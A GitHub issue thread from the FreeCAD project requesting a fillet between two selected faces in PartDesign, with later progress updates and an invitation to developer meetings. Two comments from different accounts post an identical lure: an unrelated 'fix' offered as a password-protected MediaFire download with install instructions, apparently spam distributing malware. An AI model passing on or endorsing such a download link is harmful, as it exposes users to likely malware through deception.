FreeCAD/FreeCAD #16100: PartDesign: No Face-Face fillet option

maxwxyz, 2024-08-28:
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Problem description

Currently it is not possible to create a fillet **between** two selected faces.
It may be related to the limitation mentioned in https://github.com/FreeCAD/FreeCAD/issues/5561

The fillet is created between the selected faces, removing them and creating geometry between them:
[image]

[image]

### Full version info

```shell
OS: Windows 10 build 19045
Word size of FreeCAD: 64-bit
Version: 0.22.0dev.38553 (Git)
Build type: Release
Branch: main
Hash: 59c1ccec3e6b70f56eeee8f94d361019b84bd850
Python 3.11.9, Qt 5.15.13, Coin 4.0.2, Vtk 9.2.6, OCC 7.7.2
Locale: German/Germany (de_DE)
Installed mods: 
  * Curves 0.6.42
  * fasteners 0.5.25
  * freecad.gears 1.2.0
  * Manipulator 1.5.7
```

### Subproject(s) affected?

PartDesign

### Anything else?

@pierreporte FYI

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

Dnts1, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

NEKO-JOJUK, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

codeotaku, 2026-08-27:
Some early progress on this

[image]

maxwxyz, 2026-08-27:
Wow!

codeotaku, 2026-08-27:
Super early but progressing!

maxwxyz, 2026-08-27:
@codeotaku are you on Discord? https://discord.com/invite/w2cTKGzccC
We have a dedicated OCC channel and topics there, Dimitrii is also there.

We have a weekly OCC dev meeting setup https://www.freecad.org/events.php if you want to join, Dimitrii and Pieter are also attending.

Thank you for working on these fixes!

codeotaku, 2026-08-27:
@maxwxyz  I'll join the channel and would be keen to join the dev meetings as well - thanks!